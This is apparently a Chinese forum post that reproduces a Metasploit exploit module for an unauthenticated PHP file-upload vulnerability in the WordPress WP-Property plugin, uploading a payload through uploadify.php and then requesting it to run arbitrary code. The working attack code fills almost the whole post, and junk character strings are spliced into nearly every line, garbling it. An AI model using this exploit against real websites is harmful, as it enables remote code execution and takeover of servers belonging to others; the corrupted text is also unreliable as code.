WordPress WP-Property PHP 文件上传漏洞/ i/ ~3 X# r" S. X8 w: t
$ X6 h) [' r* F& D! I+ P ## # This file is part of the Metasploit Framework and may be subject to. g$ y6 w* V t
) I3 p3 u7 `5 G# redistribution and commercial restrictions. Please see the Metasploit. [+ q; _' p; ]2 z! H
1 \/ i. c% M" b" N+ y# Framework web site for more information on licensing and terms of use.
( B# b7 j& n( W7 Q) q6 q9 h& e% E' a
# http://metasploit.com/framework/ ##" w+ b0 h4 O7 |; D5 x; i/ r
! E. Z1 g h( h7 L* }. B
+ q4 I! V8 g9 K- E* } f f- K$ {8 ?# c! p) h; T8 Q! V
& }0 U) i: U0 n/ r* V& H9 @2 S
$ B* ~; x$ p5 X) g0 R8 M, B
require 'msf/core'
& w9 j4 l2 G1 ~" v, i2 Arequire 'msf/core/exploit/php_exe'
" L2 Y' T* M, |0 T6 U; W' T
5 U* j" {, i5 ], Y1 Dclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',9 a8 R& b5 s9 T. a3 e. Q/ W; Q
'Description' => %q{2 T5 x; m2 w2 ]
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>, E8 N" _" H3 N$ s8 u. r
[/ k5 B) B* P7 o
'Sammy FORGIT', # initial discovery
2 U5 g5 P8 @6 V7 I" G) z( ['James Fitts <fitts.james[at]gmail.com>' # metasploit module3 `- y4 w! x8 i0 f* k; w& P
],* h* c& k8 p# C( U$ g d! z! |- x
'License' => MSF_LICENSE,# ^/ X5 z& W& V3 n# C5 h; Q
'References' =>
* p' t) H8 D4 L0 M6 I; u" a" G[
. p( R9 [& A+ }7 L) c3 I6 u[ 'OSVDB', '82656' ],& ~- }; h7 I8 S; t4 C; T" r) Z3 e# X
[ 'BID', '53787' ],& I% F( |7 ~' Y9 `* q! B
[ 'EDB', '18987'],; Z/ Y/ k" D Q f. l
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
* U/ P6 L: s& v],1 F# K9 O/ n! E" d1 P: i P& {3 R
'Payload' =>
* R, }/ j i# x5 L{! K9 q9 `! }) `% ]$ a
'BadChars' => "\x00",, E7 H @ N# ]9 I3 p& {
},1 _( o2 `/ Q: f X
'Platform' => 'php',
8 z2 T; K6 y2 g) Z'Arch' => ARCH_PHP,
m+ b/ U9 j9 h9 ]'Targets' =>+ [8 W" r* U, R( y% x. z& y$ n) `
[* B; M- h9 u: B+ C% t
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ]," G- R* E/ J5 z! l k* o0 I; Y
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]- d' U: o2 B- p) }/ [1 `3 R
],
1 i) D o M3 G2 w'DefaultTarget' => 0,+ p+ h, I+ M' P: h+ x
'DisclosureDate' => 'Mar 26 2012'))
+ V" {4 K3 @, C- Q( f
- n% `* z9 W# C b! V2 i6 }+ Tregister_options(
* j; t2 T! i% P% l+ B, \[
$ H- t9 a3 V& D$ `0 }% ?- eOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
- c% k/ j6 t6 t$ k* A5 W4 C D], self.class)$ i6 f. v$ |/ `( P& A' d& U
end! }, S6 E7 [ g& |
8 k8 h# o# ], h! u# \5 s% M* M' ]. jdef check
% `5 ~ K3 @+ n5 e" w4 Euri = target_uri.path& q2 z" a& ~, q7 `/ z
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
4 A3 ~: h' p/ W; _- {" `'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"6 P1 I7 t8 Z$ I: A3 i
})
4 A7 G/ i- R" ~( r- o- V5 x0 f# d6 z! b
if not res or res.code != 200 H) W K( r( U Z, ?3 P+ b
return Exploit::CheckCode::Unknown
" {+ M) U& X$ f: D2 _end
U4 O/ `3 ^" @/ c( ~* ]. V4 r9 V# q7 E; m
return Exploit::CheckCode::Appears# B( P" E' K2 }5 |
end
( h& I. z9 }8 F9 }8 U9 ?! {; H2 t0 B% j- U: o% |% w
def exploit
' p( y3 C5 J* C [# guri = target_uri.path
}* F: O' P6 d+ g0 b5 c# ]6 \0 k. K. Yuri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
) l# N; o4 D+ M
5 z5 C# b6 Z+ s3 V, U6 ldata = Rex::MIME::Message.new
; U `% X/ P' g# b! k% n kdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
) L C* D! j1 b# D! w" ~( adata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
* H8 ?& Q% [3 ]* P, R7 g+ w. _post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')- v: P& M& M: G$ p9 O$ d4 r
( P5 \9 j3 X! d% ]print_status("#{peer} - Uploading payload #{@payload_name}") K8 D* x' E+ j) [3 H$ D# ?
res = send_request_cgi({
" C0 I; ^2 ` E* \1 S1 \'method' => 'POST',2 o& E4 q* T0 h* Z7 ?' m7 f
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
. [2 [( l" q" U; D9 ?0 ['ctype' => "multipart/form-data; boundary=#{data.bound}",) u, n: x/ O. x! D( z" _
'data' => post_data# o. y" g. K6 i; P# C8 r0 \% A
})5 Q) \9 G: D4 h# l b' X( ?
% U4 b5 r, l$ Y7 N$ G- nif not res or res.code != 200 or res.body !~ /#{@payload_name}/! I1 A% G- u2 ?: N7 k
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")% n/ Y+ q, `/ Q1 Z
end* x4 ~! D3 W( w b4 X& c
0 B! F, Q; t0 kupload_uri = res.body
8 R2 \ _ H1 [2 d$ f& y: P: Y) o2 ]* r, \
print_status("#{peer} - Executing payload #{@payload_name}") ]9 y6 X& H& R' r) ^
res = send_request_raw({- o% m5 w0 z/ e# \. N
'uri' => upload_uri,
2 V/ I1 r! @& x% Y'method' => 'GET'
. t5 ^# n3 a- O9 O; h9 H})4 R. B: x; f/ m, f
end
/ G9 w& S: g: z k W( b" X; S7 t0 y: Tend
! A6 Q7 x# G; R: s: c7 H5 d- q6 X, O' e; f* r6 J$ |# L; O+ m, v% @
不要问我这写的是什么 怎么利用 我是说msf.
5 Z6 ~; ]0 a9 r. }* i* W. y. e9 W1 V2 [( T9 n8 M
|
发表于 2013-1-4 19:51:30
收藏
支持
反对